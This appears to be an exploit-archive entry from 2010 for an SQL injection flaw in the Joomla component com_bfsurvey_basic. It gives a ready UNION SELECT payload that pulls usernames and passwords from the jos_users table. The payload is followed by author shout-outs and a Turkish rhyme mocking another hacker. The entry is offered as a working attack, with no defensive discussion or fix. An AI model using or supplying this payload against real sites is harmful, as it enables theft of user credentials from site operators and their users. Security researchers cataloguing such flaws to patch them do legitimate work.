[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_bfsurvey_basic SQL Injection Vulnerability
# Published : 2010-01-03
# Author : FL0RiX
# Previous Title : Joomla Component com_biblestudy LFI Vulnerability
# Next Title : Joomla Component com_bfsurvey_pro (catid) Blind SQL Injection Exploit


[+] Joomla Component com_bfsurvey_basic SQL Injection Vulnerability

[+] Author: FL0RiX

[+] Greez  : Wretch-x And All Friends

[+] HomePage : http://oltan.org


############################################################################################################################

[+] Exploit;

     [+] null/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user(),user()/**/from/**/jos_users--


############################################################################################################################
< ---- Note ---- >
F....N;
Sen ?ok üstün zekaya sahip birisin,
emin olabilirsin, :)
Sql injection ile domain hackleyebilen tek lamersin, :)
ASP'de Rfi Bulmakta Birebirsin,
Ama G?rdügüm En hIyar Lamersin :D
Bu Kafiyelerde Bi TarafIna Girsin ;)
Lol F....N :)
< ---- Note Finished ---- >